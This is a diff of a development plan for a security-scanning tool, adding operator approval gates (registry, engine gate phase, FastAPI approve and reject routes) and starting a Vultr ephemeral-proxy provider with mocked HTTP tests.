+            description="Dangerous action",
+        )
+        task = ScanTask(
+            id="t1", scan_id="s1", name="test",
+            tool="c2", task_type=TaskType.SHELL,
+            requires_approval=req,
+        )
+        assert task.requires_approval.timeout_seconds == 1800
+        assert task.requires_approval.description == "Dangerous action"
+
+    def test_approval_ticket_fields(self):
+        from datetime import datetime, timezone
+        task = ScanTask(
+            id="t1", scan_id="s1", name="test",
+            tool="nmap", task_type=TaskType.SHELL,
+            approval_ticket_id="gate-t1-abc123",
+            approval_expires_at=datetime(2026, 4, 13, 15, 0, 0, tzinfo=timezone.utc),
+        )
+        assert task.approval_ticket_id == "gate-t1-abc123"
+        assert task.approval_expires_at.year == 2026
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_models.py::TestApprovalRequirement::test_defaults -v`
+Expected: FAIL with `ImportError: cannot import name 'ApprovalRequirement'`
+
+- [ ] **Step 3: Implement model additions**
+
+In `packages/cli/src/opentools/scanner/models.py`, add `AWAITING_APPROVAL` to `TaskStatus` (after line 60):
+
+```python
+class TaskStatus(StrEnum):
+    PENDING = "pending"
+    BLOCKED = "blocked"
+    RUNNING = "running"
+    COMPLETED = "completed"
+    FAILED = "failed"
+    SKIPPED = "skipped"
+    AWAITING_APPROVAL = "awaiting_approval"
+```
+
+Add `ApprovalRequirement` model before `ReactiveEdge` (before line 188):
+
+```python
+class ApprovalRequirement(BaseModel):
+    """Gate metadata for tasks requiring operator approval before execution."""
+    timeout_seconds: int = 3600
+    description: str = ""
+```
+
+Add new fields to `ScanTask` (after line 231, before the closing of the class):
+
+```python
+class ScanTask(BaseModel):
+    # ... existing fields through completed_at ...
+    requires_approval: Optional[ApprovalRequirement] = None
+    approval_ticket_id: Optional[str] = None
+    approval_expires_at: Optional[datetime] = None
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_models.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Run existing model tests for regression check**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_models.py tests/test_scanner/test_engine.py -v`
+Expected: All PASS
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/models.py packages/cli/tests/test_scanner/test_approval_models.py
+git commit -m "feat(models): add ApprovalRequirement, AWAITING_APPROVAL status, approval fields on ScanTask"
+```
+
+---
+
+### Task 11: ApprovalRegistry — In-Memory Notification Hub
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/approval.py`
+- Test: `packages/cli/tests/test_scanner/test_approval_registry.py`
+
+- [ ] **Step 1: Write failing tests for ApprovalRegistry**
+
+```python
+# packages/cli/tests/test_scanner/test_approval_registry.py
+"""Tests for ApprovalRegistry — in-memory notification hub."""
+
+import asyncio
+
+import pytest
+
+from opentools.scanner.approval import ApprovalRegistry
+
+
+class TestApprovalRegistry:
+    def test_register_returns_event(self):
+        registry = ApprovalRegistry()
+        event = registry.register("ticket-1")
+        assert isinstance(event, asyncio.Event)
+        assert not event.is_set()
+
+    def test_signal_sets_event(self):
+        registry = ApprovalRegistry()
+        event = registry.register("ticket-1")
+        result = registry.signal("ticket-1")
+        assert result is True
+        assert event.is_set()
+
+    def test_signal_missing_returns_false(self):
+        registry = ApprovalRegistry()
+        result = registry.signal("nonexistent")
+        assert result is False
+
+    def test_remove_cleans_up(self):
+        registry = ApprovalRegistry()
+        registry.register("ticket-1")
+        registry.remove("ticket-1")
+        assert registry.signal("ticket-1") is False
+
+    def test_remove_missing_does_not_raise(self):
+        registry = ApprovalRegistry()
+        registry.remove("nonexistent")  # should not raise
+
+    def test_has_ticket(self):
+        registry = ApprovalRegistry()
+        assert registry.has_ticket("ticket-1") is False
+        registry.register("ticket-1")
+        assert registry.has_ticket("ticket-1") is True
+
+    def test_pending_tickets(self):
+        registry = ApprovalRegistry()
+        registry.register("ticket-1")
+        registry.register("ticket-2")
+        assert registry.pending_ticket_ids() == {"ticket-1", "ticket-2"}
+
+    @pytest.mark.asyncio
+    async def test_event_wakes_awaiter(self):
+        """Verify the full async flow: register → await → signal → wake."""
+        registry = ApprovalRegistry()
+        event = registry.register("ticket-1")
+        woke = False
+
+        async def waiter():
+            nonlocal woke
+            await asyncio.wait_for(event.wait(), timeout=5.0)
+            woke = True
+
+        task = asyncio.ensure_future(waiter())
+        await asyncio.sleep(0.05)
+        assert not woke
+
+        registry.signal("ticket-1")
+        await task
+        assert woke
+
+    @pytest.mark.asyncio
+    async def test_multiple_gates_independent(self):
+        """Two gates: signaling one does not wake the other."""
+        registry = ApprovalRegistry()
+        event_a = registry.register("a")
+        event_b = registry.register("b")
+
+        registry.signal("a")
+        assert event_a.is_set()
+        assert not event_b.is_set()
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_registry.py::TestApprovalRegistry::test_register_returns_event -v`
+Expected: FAIL with `ModuleNotFoundError`
+
+- [ ] **Step 3: Implement ApprovalRegistry**
+
+```python
+# packages/cli/src/opentools/scanner/approval.py
+"""ApprovalRegistry — in-memory notification hub for HITL approval gates.
+
+NOT the source of truth. The database is always authoritative for gate
+decisions. This registry only provides asyncio.Event handles so that
+FastAPI routes can wake sleeping gate coroutines.
+
+If a ticket is missing from the registry (e.g., server restarted before
+the engine reconstructed it), the route still writes the decision to
+SQLite — the executor will pick it up on its next DB read.
+"""
+
+from __future__ import annotations
+
+import asyncio
+
+
+class ApprovalRegistry:
+    """In-memory notification hub mapping ticket IDs to asyncio.Events."""
+
+    def __init__(self) -> None:
+        self._events: dict[str, asyncio.Event] = {}
+
+    def register(self, ticket_id: str) -> asyncio.Event:
+        """Create and store an event for a gate ticket. Returns the event."""
+        event = asyncio.Event()
+        self._events[ticket_id] = event
+        return event
+
+    def signal(self, ticket_id: str) -> bool:
+        """Signal the event if it exists. Returns False if not in registry."""
+        event = self._events.get(ticket_id)
+        if event is None:
+            return False
+        event.set()
+        return True
+
+    def remove(self, ticket_id: str) -> None:
+        """Clean up after a gate resolves."""
+        self._events.pop(ticket_id, None)
+
+    def has_ticket(self, ticket_id: str) -> bool:
+        """Check if a ticket is registered."""
+        return ticket_id in self._events
+
+    def pending_ticket_ids(self) -> set[str]:
+        """Return all registered ticket IDs."""
+        return set(self._events.keys())
+```
+
+- [ ] **Step 4: Run tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_approval_registry.py -v`
+Expected: All PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/approval.py packages/cli/tests/test_scanner/test_approval_registry.py
+git commit -m "feat(approval): add ApprovalRegistry in-memory notification hub"
+```
+
+---
+
+### Task 12: Engine Integration — Gate Phase in `_execute_task`
+
+**Files:**
+- Modify: `packages/cli/src/opentools/scanner/engine.py:35-69` (`__init__` — add registry + store)
+- Modify: `packages/cli/src/opentools/scanner/engine.py:215-251` (`_execute_task` — insert gate phase)
+- Test: `packages/cli/tests/test_scanner/test_engine_approval.py`
+
+**Context:** The gate phase inserts between resource acquisition and executor dispatch. It persists `AWAITING_APPROVAL` + `expires_at` to the store, registers an event, sleeps, then reads the decision from the store on wake. The resource pool uses an `approval_gate` group with effectively unlimited slots so sleeping gates don't starve real workers.
+
+- [ ] **Step 1: Write failing integration tests**
+
+```python
+# packages/cli/tests/test_scanner/test_engine_approval.py
+"""Integration tests: ScanEngine + HITL approval gate."""
+
+import asyncio
+from datetime import datetime, timezone
+from typing import Any, Callable
+
+import pytest
+
+from opentools.scanner.approval import ApprovalRegistry
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.engine import ScanEngine
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.models import (
+    ApprovalRequirement,
+    Scan,
+    ScanStatus,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+    TargetType,
+)
+from opentools.shared.progress import EventBus
+from opentools.shared.resource_pool import AdaptiveResourcePool
+
+
+class MockExecutor:
+    def __init__(self, results: dict[str, TaskOutput] | None = None):
+        self._results = results or {}
+        self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10)
+        self.executed: list[str] = []
+
+    async def execute(
+        self, task: ScanTask, on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        self.executed.append(task.id)
+        return self._results.get(task.id, self._default)
+
+
+class FakeStore:
+    """Minimal in-memory store for approval gate testing."""
+
+    def __init__(self) -> None:
+        self._task_statuses: dict[str, dict[str, Any]] = {}
+
+    async def update_task_status(self, task_id: str, status: str, **fields) -> None:
+        self._task_statuses[task_id] = {"status": status, **fields}
+
+    async def get_task_status(self, task_id: str) -> dict[str, Any] | None:
+        return self._task_statuses.get(task_id)
+
+
+def _make_scan() -> Scan:
+    return Scan(
+        id="scan-1", engagement_id="eng-1", target="10.0.0.1",
+        target_type=TargetType.NETWORK, status=ScanStatus.PENDING,
+        created_at=datetime.now(timezone.utc),
+    )
+
+
+def _make_gated_task(
+    task_id: str = "gated-task",
+    timeout_seconds: int = 3600,
+    description: str = "Dangerous action",
+) -> ScanTask:
+    return ScanTask(
+        id=task_id, scan_id="scan-1", name="gated",
+        tool="c2-agent", task_type=TaskType.SHELL,
+        command="echo approved",
+        requires_approval=ApprovalRequirement(
+            timeout_seconds=timeout_seconds,
+            description=description,
+        ),
+    )
+
+
+def _make_engine(
+    tasks: list[ScanTask],
+    executor: MockExecutor,
+    store: FakeStore | None = None,
+    registry: ApprovalRegistry | None = None,
+) -> ScanEngine:
+    pool = AdaptiveResourcePool(
+        global_limit=4,
+        group_limits={"approval_gate": 9999},
+    )
+    executors = {
+        TaskType.SHELL: executor,
+        TaskType.DOCKER_EXEC: executor,
+        TaskType.MCP_CALL: executor,
+    }
+    engine = ScanEngine(
+        scan=_make_scan(),
+        resource_pool=pool,
+        executors=executors,
+        event_bus=EventBus(),
+        cancellation=CancellationToken(),
+    )
+
+    if registry is not None:
+        engine.set_approval_registry(registry)
+    if store is not None:
+        engine.set_approval_store(store)
+
+    engine.load_tasks(tasks)
+    return engine
+
+
+class TestEngineApprovalGate:
+    @pytest.mark.asyncio
+    async def test_approved_task_executes(self):
+        """Gate approved → real executor fires → task completes."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=5)
+        engine = _make_engine([task], executor, store, registry)
+
+        async def approve_soon():
+            # Wait for the gate to register, then approve via store + signal
+            for _ in range(50):
+                await asyncio.sleep(0.05)
+                if registry.has_ticket(registry.pending_ticket_ids().pop()) if registry.pending_ticket_ids() else False:
+                    break
+            tickets = registry.pending_ticket_ids()
+            assert len(tickets) == 1
+            ticket_id = tickets.pop()
+            # Write-before-signal: persist to store first
+            await store.update_task_status(
+                task.id, "approved",
+                approval_ticket_id=ticket_id,
+            )
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(approve_soon())
+        await engine.run()
+
+        assert "gated-task" in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_rejected_task_fails(self):
+        """Gate rejected → executor never fires → task fails."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=5)
+        engine = _make_engine([task], executor, store, registry)
+
+        async def reject_soon():
+            for _ in range(50):
+                await asyncio.sleep(0.05)
+                if registry.pending_ticket_ids():
+                    break
+            ticket_id = registry.pending_ticket_ids().pop()
+            await store.update_task_status(
+                task.id, "rejected",
+                approval_ticket_id=ticket_id,
+            )
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(reject_soon())
+        await engine.run()
+
+        assert "gated-task" not in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.FAILED
+
+    @pytest.mark.asyncio
+    async def test_timeout_rejects_automatically(self):
+        """Gate times out → executor never fires → task fails."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+        task = _make_gated_task(timeout_seconds=1)  # 1 second timeout
+        engine = _make_engine([task], executor, store, registry)
+
+        await engine.run()
+
+        assert "gated-task" not in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.FAILED
+        # Verify store was updated with expiry
+        stored = await store.get_task_status("gated-task")
+        assert stored is not None
+        assert stored["status"] == "approval_expired"
+
+    @pytest.mark.asyncio
+    async def test_non_gated_task_unaffected(self):
+        """Tasks without requires_approval execute normally."""
+        executor = MockExecutor()
+        task = ScanTask(
+            id="normal", scan_id="scan-1", name="normal",
+            tool="nmap", task_type=TaskType.SHELL, command="echo normal",
+        )
+        engine = _make_engine([task], executor)
+        await engine.run()
+
+        assert "normal" in executor.executed
+        assert engine._tasks["normal"].status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_parallel_branches_continue_during_gate(self):
+        """Safe branch executes while gated branch is sleeping."""
+        executor = MockExecutor()
+        store = FakeStore()
+        registry = ApprovalRegistry()
+
+        safe_task = ScanTask(
+            id="safe", scan_id="scan-1", name="safe",
+            tool="nmap", task_type=TaskType.SHELL, command="echo safe",
+        )
+        gated_task = _make_gated_task(timeout_seconds=1)
+
+        engine = _make_engine([safe_task, gated_task], executor, store, registry)
+        await engine.run()
+
+        # Safe branch ran immediately; gated branch timed out
+        assert "safe" in executor.executed
+        assert "gated-task" not in executor.executed
+        assert engine._tasks["safe"].status == TaskStatus.COMPLETED
+        assert engine._tasks["gated-task"].status == TaskStatus.FAILED
+
+    @pytest.mark.asyncio
+    async def test_no_gate_without_registry(self):
+        """If no registry set, gated tasks execute immediately (no gate)."""
+        executor = MockExecutor()
+        task = _make_gated_task(timeout_seconds=5)
+        engine = _make_engine([task], executor)  # no registry, no store
+        await engine.run()
+
+        assert "gated-task" in executor.executed
+        assert engine._tasks["gated-task"].status == TaskStatus.COMPLETED
+```
+
+- [ ] **Step 2: Run tests to verify they fail**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_approval.py::TestEngineApprovalGate::test_non_gated_task_unaffected -v`
+Expected: FAIL with `AttributeError: 'ScanEngine' object has no attribute 'set_approval_registry'`
+
+- [ ] **Step 3: Add approval fields to ScanEngine.__init__**
+
+In `packages/cli/src/opentools/scanner/engine.py`, add after the existing `_pipeline_results` field (around line 69):
+
+```python
+        # Approval gate (optional — engine works without it)
+        self._approval_registry: Any | None = None
+        self._approval_store: Any | None = None
+```
+
+Add public setters after the existing `set_cache` method:
+
+```python
+    def set_approval_registry(self, registry: Any) -> None:
+        """Set the ApprovalRegistry for HITL gate support."""
+        self._approval_registry = registry
+
+    def set_approval_store(self, store: Any) -> None:
+        """Set the store for persisting gate state."""
+        self._approval_store = store
+```
+
+- [ ] **Step 4: Modify _execute_task — insert gate phase**
+
+Replace the existing `_execute_task` method (lines 215-251) with:
+
+```python
+    async def _execute_task(
+        self, task: ScanTask, executor: TaskExecutor
+    ) -> TaskOutput:
+        """Check cache → gate phase → acquire resource → dispatch to executor → release."""
+        # Cache check
+        if task.cache_key and task.cache_key in self._cache:
+            return self._cache[task.cache_key]
+
+        # --- GATE PHASE (if task requires approval and registry is configured) ---
+        if (
+            task.requires_approval is not None
+            and self._approval_registry is not None
+            and self._approval_store is not None
+        ):
+            gate_result = await self._run_approval_gate(task)
+            if gate_result is not None:
+                return gate_result  # rejected or expired
+
+        # --- NORMAL EXECUTION ---
+        resource_group = task.resource_group or task.task_type.value
+
+        if task.retry_policy is not None:
+            from opentools.shared.retry import execute_with_retry
+
+            async def _attempt() -> TaskOutput:
+                await self._pool.acquire(task.id, task.priority, resource_group)
+                try:
+                    return await executor.execute(
+                        task, lambda _chunk: None, self._cancellation
+                    )
+                finally:
+                    self._pool.release(resource_group)
+
+            output = await execute_with_retry(_attempt, task.retry_policy)
+        else:
+            await self._pool.acquire(task.id, task.priority, resource_group)
+            try:
+                output = await executor.execute(
+                    task, lambda _chunk: None, self._cancellation
+                )
+            finally:
+                self._pool.release(resource_group)
+
+        # Populate cache on success
+        if task.cache_key and output.exit_code == 0:
+            self._cache[task.cache_key] = output.model_copy(update={"cached": True})
+
+        return output
+
+    async def _run_approval_gate(self, task: ScanTask) -> TaskOutput | None:
+        """Execute the approval gate phase. Returns None if approved (proceed),
+        or a TaskOutput if rejected/expired (stop)."""
+        import uuid
+        from datetime import datetime, timedelta, timezone
+
+        timeout = task.requires_approval.timeout_seconds
+        ticket_id = f"gate-{task.id}-{uuid.uuid4().hex[:8]}"
+        expires_at = datetime.now(timezone.utc) + timedelta(seconds=timeout)
+
+        # 1. Persist to store (source of truth)
+        task.approval_ticket_id = ticket_id
+        task.approval_expires_at = expires_at
+        await self._approval_store.update_task_status(
+            task.id, TaskStatus.AWAITING_APPROVAL.value,
+            approval_ticket_id=ticket_id,
+            approval_expires_at=expires_at.isoformat(),
+        )
+
+        # 2. Publish SSE event (if event bus supports it)
+        # The event bus is best-effort; failure here doesn't block the gate.
+        try:
+            self._event_bus.publish({
+                "type": "approval_required",
+                "scan_id": self.scan.id,
+                "task_id": task.id,
+                "ticket_id": ticket_id,
+                "tool": task.tool,
+                "command": task.command,
+                "description": task.requires_approval.description,
+                "expires_at": expires_at.isoformat(),
+            })
+        except Exception:
+            pass
+
+        # 3. Register event and sleep
+        event = self._approval_registry.register(ticket_id)
+
+        remaining = (expires_at - datetime.now(timezone.utc)).total_seconds()
+        if remaining <= 0:
+            self._approval_registry.remove(ticket_id)
+            await self._approval_store.update_task_status(
+                task.id, "approval_expired",
+            )
+            return TaskOutput(exit_code=2, stderr="approval expired before gate could sleep")
+
+        # Acquire from unlimited approval_gate group while sleeping
+        await self._pool.acquire(task.id, task.priority, "approval_gate")
+        try:
+            try:
+                await asyncio.wait_for(event.wait(), timeout=remaining)
+            except asyncio.TimeoutError:
+                pass  # handled by DB read below
+        finally:
+            self._pool.release("approval_gate")
+            self._approval_registry.remove(ticket_id)
+
+        # 4. READ TRUTH from store (never trust why we woke up)
+        stored = await self._approval_store.get_task_status(task.id)
+        if stored is not None:
+            status = stored.get("status", "")
+        else:
+            status = ""
+
+        if status == "approved":
+            # Gate passed — update task status back to RUNNING and return None
+            # to signal _execute_task to proceed to the real executor
+            task.status = TaskStatus.RUNNING
+            return None
+
+        if status == "rejected":
+            return TaskOutput(
+                exit_code=1,
+                stderr="rejected by operator",
+            )
+
+        # Timeout or unknown state
+        await self._approval_store.update_task_status(
+            task.id, "approval_expired",
+        )
+        return TaskOutput(
+            exit_code=2,
+            stderr="approval expired",
+        )
+```
+
+- [ ] **Step 5: Run integration tests to verify they pass**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine_approval.py -v`
+Expected: All PASS
+
+- [ ] **Step 6: Run existing engine tests for regression check**
+
+Run: `cd packages/cli && python -m pytest tests/test_scanner/test_engine.py -v`
+Expected: All PASS — no regressions. Tasks without `requires_approval` are unaffected.
+
+- [ ] **Step 7: Commit**
+
+```bash
+git add packages/cli/src/opentools/scanner/engine.py packages/cli/tests/test_scanner/test_engine_approval.py
+git commit -m "feat(engine): integrate HITL approval gate phase into _execute_task"
+```
+
+---
+
+### Task 13: FastAPI Gate Endpoints — List, Approve, Reject
+
+**Files:**
+- Modify: `packages/web/backend/app/models.py:252-284` (add columns to ScanTaskRecord)
+- Modify: `packages/web/backend/app/routes/scans.py` (add gate endpoints after cancel endpoint)
+- Test: `packages/web/backend/tests/test_gate_routes.py`
+
+**Context:** The approve/reject routes enforce **write-before-signal**: they update the database first, then signal the in-memory event. The `ApprovalRegistry` singleton is stored in `_active_scans[scan_id]` alongside the engine reference, following the existing pattern at [api.py:199](packages/cli/src/opentools/scanner/api.py#L199).
+
+- [ ] **Step 1: Add approval columns to ScanTaskRecord**
+
+In `packages/web/backend/app/models.py`, add after line 284 (after `completed_at`):
+
+```python
+class ScanTaskRecord(SQLModel, table=True):
+    # ... existing fields ...
+    # Approval gate fields
+    approval_ticket_id: Optional[str] = None
+    approval_expires_at: Optional[datetime] = Field(default=None, **_TZ_KW)
+```
+
+- [ ] **Step 2: Add gate request/response models and endpoints to scans.py**
+
+Append to `packages/web/backend/app/routes/scans.py`, after the cancel endpoint (after line 380):
+
+```python
+# ---------------------------------------------------------------------------
+# Approval gate endpoints
+# ---------------------------------------------------------------------------
+
+
+class GateResponse(BaseModel):
+    ticket_id: str
+    task_id: str
+    tool: str
+    command: Optional[str] = None
+    description: str
+    status: str
+    expires_at: Optional[str] = None
+
+
+class GateDecisionResponse(BaseModel):
+    ticket_id: str
+    decision: str
+
+
+class GateRejectRequest(BaseModel):
+    reason: str = "operator rejected"
+
+
+@router.get("/{scan_id}/gates")
+async def list_pending_gates(
+    scan_id: str,
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """List tasks awaiting operator approval for a scan."""
+    svc = ScanService(session, user)
+    scan = await svc.get_scan(scan_id)
+    if scan is None:
+        raise HTTPException(status_code=404, detail="Scan not found")
+
+    tasks = await svc.get_scan_tasks(scan_id)
+    gates = []
+    for t in tasks:
+        if t.status == "awaiting_approval" and t.approval_ticket_id:
+            gates.append(GateResponse(
+                ticket_id=t.approval_ticket_id,
+                task_id=t.id,
+                tool=t.tool,
+                command=t.command,
+                description="",  # extracted from requires_approval JSON if available
+                status=t.status,
+                expires_at=t.approval_expires_at.isoformat() if t.approval_expires_at else None,
+            ))
+    return {"scan_id": scan_id, "gates": gates}
+
+
+@router.post("/{scan_id}/gates/{ticket_id}/approve")
+async def approve_gate(
+    scan_id: str,
+    ticket_id: str,
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """Approve a pending approval gate. Write-before-signal."""
+    svc = ScanService(session, user)
+
+    # 1. Validate
+    task_record = await svc.get_task_by_ticket(scan_id, ticket_id)
+    if task_record is None:
+        raise HTTPException(status_code=404, detail="Gate ticket not found")
+    if task_record.status != "awaiting_approval":
+        raise HTTPException(
+            status_code=409,
+            detail=f"Gate already resolved: {task_record.status}",
+        )
+
+    # 2. PERSIST FIRST (source of truth)
+    await svc.update_task_approval_status(task_record.id, "approved")
+    await session.commit()
+
+    # 3. Signal event (best-effort tripwire)
+    from opentools.scanner.api import _active_scans
+    entry = _active_scans.get(scan_id, {})
+    registry = entry.get("approval_registry")
+    if registry is not None:
+        registry.signal(ticket_id)
+
+    return GateDecisionResponse(ticket_id=ticket_id, decision="approved")
+
+
+@router.post("/{scan_id}/gates/{ticket_id}/reject")
+async def reject_gate(
+    scan_id: str,
+    ticket_id: str,
+    body: GateRejectRequest = GateRejectRequest(),
+    session: AsyncSession = Depends(get_db),
+    user: User = Depends(get_current_user),
+):
+    """Reject a pending approval gate. Write-before-signal."""
+    svc = ScanService(session, user)
+
+    # 1. Validate
+    task_record = await svc.get_task_by_ticket(scan_id, ticket_id)
+    if task_record is None:
+        raise HTTPException(status_code=404, detail="Gate ticket not found")
+    if task_record.status != "awaiting_approval":
+        raise HTTPException(
+            status_code=409,
+            detail=f"Gate already resolved: {task_record.status}",
+        )
+
+    # 2. PERSIST FIRST
+    await svc.update_task_approval_status(task_record.id, "rejected")
+    await session.commit()
+
+    # 3. Signal event
+    from opentools.scanner.api import _active_scans
+    entry = _active_scans.get(scan_id, {})
+    registry = entry.get("approval_registry")
+    if registry is not None:
+        registry.signal(ticket_id)
+
+    return GateDecisionResponse(ticket_id=ticket_id, decision="rejected")
+```
+
+- [ ] **Step 3: Add helper methods to ScanService**
+
+These are the two new methods the gate routes need. Add to `packages/web/backend/app/services/scan_service.py`:
+
+```python
+    async def get_task_by_ticket(
+        self, scan_id: str, ticket_id: str
+    ) -> ScanTaskRecord | None:
+        """Find a task by its approval ticket ID within a scan."""
+        from sqlalchemy import select
+        stmt = (
+            select(ScanTaskRecord)
+            .where(ScanTaskRecord.scan_id == scan_id)
+            .where(ScanTaskRecord.approval_ticket_id == ticket_id)
+        )
+        result = await self.session.execute(stmt)
+        return result.scalar_one_or_none()
+
+    async def update_task_approval_status(
+        self, task_id: str, status: str
+    ) -> None:
+        """Update a task's status (for gate approval/rejection)."""
+        from sqlalchemy import update
+        stmt = (
+            update(ScanTaskRecord)
+            .where(ScanTaskRecord.id == task_id)
+            .values(status=status)
+        )
+        await self.session.execute(stmt)
+```
+
+- [ ] **Step 4: Write route tests**
+
+```python
+# packages/web/backend/tests/test_gate_routes.py
+"""Tests for approval gate API routes."""
+
+import pytest
+from httpx import AsyncClient
+
+
+@pytest.mark.asyncio
+async def test_list_gates_empty(client: AsyncClient, auth_headers: dict):
+    """No pending gates returns empty list."""
+    # This test depends on the conftest fixtures creating a scan
+    # Minimal smoke test — full integration requires seeded data
+    resp = await client.get(
+        "/api/v1/scans/nonexistent/gates", headers=auth_headers,
+    )
+    assert resp.status_code == 404
+
+
+@pytest.mark.asyncio
+async def test_approve_missing_ticket(client: AsyncClient, auth_headers: dict):
+    resp = await client.post(
+        "/api/v1/scans/scan-1/gates/nonexistent/approve",
+        headers=auth_headers,
+    )
+    assert resp.status_code == 404
+
+
+@pytest.mark.asyncio
+async def test_reject_missing_ticket(client: AsyncClient, auth_headers: dict):
+    resp = await client.post(
+        "/api/v1/scans/scan-1/gates/nonexistent/reject",
+        headers=auth_headers,
+        json={"reason": "test"},
+    )
+    assert resp.status_code == 404
+```
+
+- [ ] **Step 5: Run tests**
+
+Run: `cd packages/web/backend && python -m pytest tests/test_gate_routes.py -v`
+Expected: PASS (404 cases)
+
+- [ ] **Step 6: Commit**
+
+```bash
+git add packages/web/backend/app/models.py packages/web/backend/app/routes/scans.py packages/web/backend/app/services/scan_service.py packages/web/backend/tests/test_gate_routes.py
+git commit -m "feat(api): add HITL gate endpoints — list, approve, reject with write-before-signal"
+```
+
+---
+
+## Task 6b: Vultr Provider
+
+### Task 6b: VultrProvider Implementation
+
+**Files:**
+- Create: `packages/cli/src/opentools/scanner/infra/vultr.py`
+- Test: `packages/cli/tests/test_scanner/test_infra_vultr.py`
+
+**Context:** Implements `CloudNodeProvider` ABC (defined in Phase B Task 6). Uses `httpx.AsyncClient` with `MockTransport` for testing. The `sshkey_id` array is a hard requirement in the creation payload — without it, the instance boots with no authorized keys and the SSH tunnel fails.
+
+- [ ] **Step 1: Write failing tests for VultrProvider**
+
+```python
+# packages/cli/tests/test_scanner/test_infra_vultr.py
+"""Tests for VultrProvider — ephemeral Vultr instance provisioning."""
+
+import json
+
+import httpx
+import pytest
+
+from opentools.scanner.infra.provider import (
+    ProvisioningError,
+    ProvisioningTimeout,
+)
+from opentools.scanner.infra.vultr import VultrProvider
+
+
+class TestVultrProviderCreate:
+    @pytest.mark.asyncio
+    async def test_create_sends_correct_payload(self):
+        captured = {}
+
+        async def handler(request: httpx.Request) -> httpx.Response:
+            captured["body"] = json.loads(request.content)
+            captured["url"] = str(request.url)
+            return httpx.Response(202, json={
+                "instance": {"id": "vtr-abc123"},
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            transport=transport,
+            base_url="https://api.vultr.com/v2",
+        )
+        provider = VultrProvider(client=client)
+
+        result = await provider.create_node(
+            region="ewr",
+            ssh_public_key="ssh-key-uuid-1234",
+            tags=["opentools-ephemeral-proxy", "scan:scan-1"],
+        )
+
+        assert result == "vtr-abc123"
+        body = captured["body"]
+        assert body["region"] == "ewr"
+        assert body["plan"] == "vc2-1c-0.5gb"
+        assert body["os_id"] == 2284
+        assert body["sshkey_id"] == ["ssh-key-uuid-1234"]
+        assert "opentools-ephemeral-proxy" in body["tags"]
+        assert body["backups"] == "disabled"
+        assert body["activation_email"] is False
+
+    @pytest.mark.asyncio
+    async def test_create_returns_instance_id(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(202, json={
+                "instance": {"id": "vtr-def456"},
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        result = await provider.create_node("lax", "key-id", ["tag"])
+        assert result == "vtr-def456"
+
+
+class TestVultrProviderPoll:
+    @pytest.mark.asyncio
+    async def test_active_with_ip(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "instance": {
+                    "id": "vtr-abc",
+                    "status": "active",
+                    "power_status": "running",
+                    "main_ip": "149.28.1.1",
+                },
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        status, ip = await provider.poll_status("vtr-abc")
+        assert status == "active"
+        assert ip == "149.28.1.1"
+
+    @pytest.mark.asyncio
+    async def test_active_with_zero_ip_is_creating(self):
+        """Vultr reports active before IP is assigned — treat as creating."""
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "instance": {
+                    "id": "vtr-abc",
+                    "status": "active",
+                    "power_status": "running",
+                    "main_ip": "0.0.0.0",
+                },
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        status, ip = await provider.poll_status("vtr-abc")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_pending_status(self):
+        async def handler(request: httpx.Request) -> httpx.Response:
+            return httpx.Response(200, json={
+                "instance": {
+                    "id": "vtr-abc",
+                    "status": "pending",
+                    "power_status": "stopped",
+                    "main_ip": "0.0.0.0",
+                },
+            })
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(transport=transport, base_url="https://api.vultr.com/v2")
+        provider = VultrProvider(client=client)
+
+        status, ip = await provider.poll_status("vtr-abc")
+        assert status == "creating"
+        assert ip is None
+
+
